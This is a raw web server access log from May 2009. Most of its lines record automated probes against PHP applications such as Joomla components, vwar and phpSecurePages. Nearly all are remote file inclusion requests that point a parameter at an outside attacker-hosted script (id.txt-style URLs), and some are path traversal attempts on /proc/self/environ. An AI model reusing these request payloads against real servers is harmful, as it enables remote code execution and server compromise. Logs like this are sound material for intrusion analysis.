208.64.202.135 - - [23/May/2009:05:37:58 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:58 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:58 -0400] "GET /logs/access_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:58 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:59 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:59 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:37:59 -0400] "GET /logs/access_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:38:00 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:38:47 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:38:47 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:38:47 -0400] "GET /logs/access_log.Q108072100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:38:47 -0400] "GET /logs/access_log.Q108061100/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.157.225.65 - - [23/May/2009:05:39:10 -0400] "GET ///skin/zero_vote/setup.php?dir=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
221.157.225.65 - - [23/May/2009:05:39:10 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/setup.php?dir=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
221.157.225.65 - - [23/May/2009:05:39:10 -0400] "GET /logs///skin/zero_vote/setup.php?dir=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:39:19 -0400] "GET /logs/access_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:39:19 -0400] "GET /logs/access_log.Q108072100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:39:25 -0400] "GET /logs/access_log.Q108110900//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:39:27 -0400] "GET //components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:39:27 -0400] "GET /logs//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:39:36 -0400] "GET /logs/access_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:39:36 -0400] "GET /logs/access_log.Q108072100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:39:43 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:39:57 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:03 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:03 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:03 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:40:07 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:11 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:11 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:05:40:11 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
213.246.62.35 - - [23/May/2009:05:40:23 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://jamur.do.am/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:05:40:25 -0400] "GET /logs/access_log.Q109050700//components/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:05:40:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94318317700406D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.241.40.51 - - [23/May/2009:05:40:44 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:05:40:44 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
211.241.40.51 - - [23/May/2009:05:40:44 -0400] "GET /logs/error_log.Q108101100%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
208.64.202.135 - - [23/May/2009:05:40:57 -0400] "GET /logs/access_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:40:57 -0400] "GET /logs/access_log.Q108061100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:40:57 -0400] "GET /logs/access_log.Q108072100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:40:57 -0400] "GET /logs/access_log.Q108072100%20%20/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:05:41:04 -0400] "GET /?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:05:41:04 -0400] "GET /logs/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:05:41:04 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.234.63.110 - - [23/May/2009:05:41:10 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:05:41:49 -0400] "GET /logs/access_log.Q108062400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:05:41:49 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
64.34.181.87 - - [23/May/2009:05:41:49 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
209.59.12.99 - - [23/May/2009:05:42:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [23/May/2009:05:42:24 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:05:42:35 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.34.181.87 - - [23/May/2009:05:44:40 -0400] "GET /logs/access_log.Q108051700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.maierarchitekten.de/manager/processors/help.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
124.0.54.98 - - [23/May/2009:05:44:46 -0400] "GET /?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:05:44:46 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:05:44:47 -0400] "GET /logs/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:05:44:53 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:05:45:16 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:05:45:21 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://about-dogs.info/hard/fx2id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:47:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.43.0.140 - - [23/May/2009:05:50:40 -0400] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:50:40 -0400] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:50:55 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:50:55 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:50:55 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:51:24 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:52:27 -0400] "GET /logs/access_log.Q108091400%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.43.0.140 - - [23/May/2009:05:52:36 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.wentina.hellospace.net/bacu/mydb?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:05:52:43 -0400] "GET //?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:05:52:43 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:05:52:43 -0400] "GET /logs//?_zb_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2495 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:53:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.6.47.6 - - [23/May/2009:05:53:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.28 Safari/530.5"
61.6.47.6 - - [23/May/2009:05:53:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.28 Safari/530.5"
211.241.40.51 - - [23/May/2009:05:53:49 -0400] "GET /logs/error_log.Q109010200//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
208.64.202.135 - - [23/May/2009:05:53:51 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.64.202.135 - - [23/May/2009:05:54:09 -0400] "GET /logs/access_log.Q108091400/joomla/index.php?option=com_restaurante&task=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:05:54:46 -0400] "GET /errors.php?error=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:05:54:51 -0400] "GET /logs/errors.php?error=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.94.148.39 - - [23/May/2009:05:54:51 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:05:55:02 -0400] "GET /logs/error_log.Q108101100//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
200.32.100.130 - - [23/May/2009:05:55:16 -0400] "GET //index.php?pagina=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:05:55:16 -0400] "GET /logs/access_log.Q109013000%20%20//index.php?pagina=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:05:55:16 -0400] "GET /logs//index.php?pagina=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:05:58:01 -0400] "GET //modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:05:58:01 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:05:58:01 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:05:58:11 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:05:58:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.94.148.39 - - [23/May/2009:05:58:59 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.multicolorprint.ch/.numpang/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.12 - - [23/May/2009:05:59:34 -0400] "GET /logs/error_log.Q108081200/phpSecurePages/secure.php?&cfgProgDir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:05:59:34 -0400] "GET /phpSecurePages/secure.php?&cfgProgDir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
77.221.130.12 - - [23/May/2009:05:59:34 -0400] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
60.251.217.4 - - [23/May/2009:05:59:57 -0400] "GET /modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:05:59:57 -0400] "GET /logs/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:05:59:57 -0400] "GET /logs/access_log.Q108091400/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:06:00:16 -0400] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
210.109.101.217 - - [23/May/2009:06:00:16 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:06:00:17 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.814"
69.237.82.158 - - [23/May/2009:06:00:18 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.814"
69.237.82.158 - - [23/May/2009:06:00:18 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
201.232.54.48 - - [23/May/2009:06:00:39 -0400] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
201.232.54.48 - - [23/May/2009:06:00:39 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
69.237.82.158 - - [23/May/2009:06:00:56 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.175.122.228 - - [23/May/2009:06:00:58 -0400] "GET /e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
66.175.122.228 - - [23/May/2009:06:00:58 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:02:14 -0400] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:02:15 -0400] "GET /logs/access_log.Q108061500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
60.251.217.4 - - [23/May/2009:06:02:20 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.colhouston.org/eventos/image/idfx1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:06:02:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [23/May/2009:06:03:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [23/May/2009:06:03:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.32.100.130 - - [23/May/2009:06:03:55 -0400] "GET /logs/access_log.Q108120400//index.php?pagina=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:06:04:07 -0400] "GET /logs/access_log.Q109021900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:06:04:07 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:06:04:07 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.98.80.2 - - [23/May/2009:06:04:48 -0400] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.itravelcenter.net/idv6.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
65.98.80.2 - - [23/May/2009:06:04:48 -0400] "GET /logs/error_log.Q108081200/phpSecurePages/secure.php?&cfgProgDir=http://www.itravelcenter.net/idv6.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
65.98.80.2 - - [23/May/2009:06:04:48 -0400] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.itravelcenter.net/idv6.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
216.151.134.36 - - [23/May/2009:06:05:56 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:05:56 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:06:05:56 -0400] "GET /logs/access_log.Q109051100%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:06:06:26 -0400] "GET //tools/send_reminders.php?noSet=0&includedir=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:06:06:26 -0400] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:06:06:28 -0400] "GET /logs/access_log.Q108123000//tools/send_reminders.php?noSet=0&includedir=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
80.67.30.155 - - [23/May/2009:06:07:23 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.182.137.218 - - [23/May/2009:06:07:28 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
207.182.137.218 - - [23/May/2009:06:07:28 -0400] "GET /logs/access_log.Q108052200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
207.182.137.218 - - [23/May/2009:06:07:29 -0400] "GET /logs/access_log.Q108081600/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.820"
207.182.137.218 - - [23/May/2009:06:07:29 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.98.22.241/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.820"
209.59.12.99 - - [23/May/2009:06:08:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.237.82.158 - - [23/May/2009:06:09:05 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
